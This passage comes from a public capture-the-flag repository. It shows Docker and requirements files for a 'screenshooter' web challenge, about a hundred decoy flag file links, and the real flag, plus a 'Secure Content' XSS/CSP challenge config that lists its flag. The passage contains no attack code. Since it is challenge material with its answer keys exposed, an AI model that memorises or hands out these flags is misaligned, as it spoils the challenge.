21 | version: "0.1" 22 | -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/dist/requirements.txt: -------------------------------------------------------------------------------- 1 | flask~=1.1.4 2 | markupsafe==2.0.1 -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Solution in `soln/` -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.8-alpine 3 | 4 | # switch working directory 5 | WORKDIR /app 6 | 7 | RUN apk update 8 | RUN apk add firefox 9 | RUN apk add font-terminus 10 | COPY ./requirements.txt /app/requirements.txt 11 | # install the dependencies and packages in the requirements file 12 | RUN pip install -r requirements.txt 13 | 14 | # copy every content from the local file to the image 15 | COPY . /app 16 | RUN chmod 777 /app/screenshots 17 | RUN adduser --uid 1001 --disabled-password nonroot 18 | USER 1001 19 | # configure the container to run in an executed manner 20 | ENTRYPOINT [ "python" ] 21 | 22 | CMD ["app.py" ] 23 | -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | screenshooter: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag1.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag1.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag10.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag10.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag100.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag100.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag11.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag11.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag12.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag12.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag13.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag13.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag14.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag14.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag15.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag15.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag16.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag16.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag17.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag17.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag18.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag18.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag19.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag19.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag2.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag2.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag20.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag20.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag21.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag21.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag22.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag22.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag23.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag23.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag24.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag24.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag25.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag25.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag26.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag26.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag27.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag27.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag28.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag28.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag29.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag29.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag3.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag3.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag30.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag30.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag31.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag31.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag32.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag32.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag33.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag33.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag34.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag34.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag35.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag35.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag36.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag36.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag37.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag37.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag38.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag38.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag39.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag39.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag4.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag4.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag40.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag40.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag41.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag41.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag42.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag42.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag43.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag43.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag44.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag44.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag45.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag45.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag46.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag46.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag47.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag47.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag48.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag48.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag49.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag49.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag5.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag5.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag50.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag50.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag51.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag51.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag52.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag52.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag53.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag53.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag54.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag54.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag55.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag55.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag56.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag56.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag57.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag57.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag58.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag58.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag59.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag59.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag6.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag6.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag60.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag60.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag61.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag61.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag62.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag62.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag63.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag63.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag64.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag64.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag65.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag65.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag66.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag66.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag67.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag67.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag68.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag68.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag69.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag69.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag7.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag7.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag70.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag70.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag71.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag71.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag72.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag72.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag73.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag73.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag74.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag74.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag75.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag75.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag76.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag76.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag77.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag77.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag78.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag78.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag79.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag79.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag8.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag8.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag80.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag80.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag81.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag81.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag82.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag82.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag83.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag83.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag84.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag84.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag85.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag85.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag86.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag86.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag87.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag87.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag88.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag88.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag89.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag89.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag9.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag9.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag90.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag90.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag91.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag91.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag92.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag92.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag93.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag93.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag94.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag94.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag95.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag95.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag96.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag96.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag97.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag97.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag98.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag98.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/fakeflag99.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/screenshooter/src/flags/fakeflag99.txt -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/flags/theactuallyrealflag: -------------------------------------------------------------------------------- 1 | blahaj{fL45k_D3veL0p0r} -------------------------------------------------------------------------------- /Challenges/Web/screenshooter/src/requirements.txt: -------------------------------------------------------------------------------- 1 | flask~=1.1.4 2 | markupsafe==2.0.1 -------------------------------------------------------------------------------- /Challenges/Web/securecontent/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Secure Content 2 | author: fern 3 | category: web 4 | description: I know there is an XSS somewhere in my website, but surely CSP will protect me, right? 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{D4nG13_tH3_MArKuP} 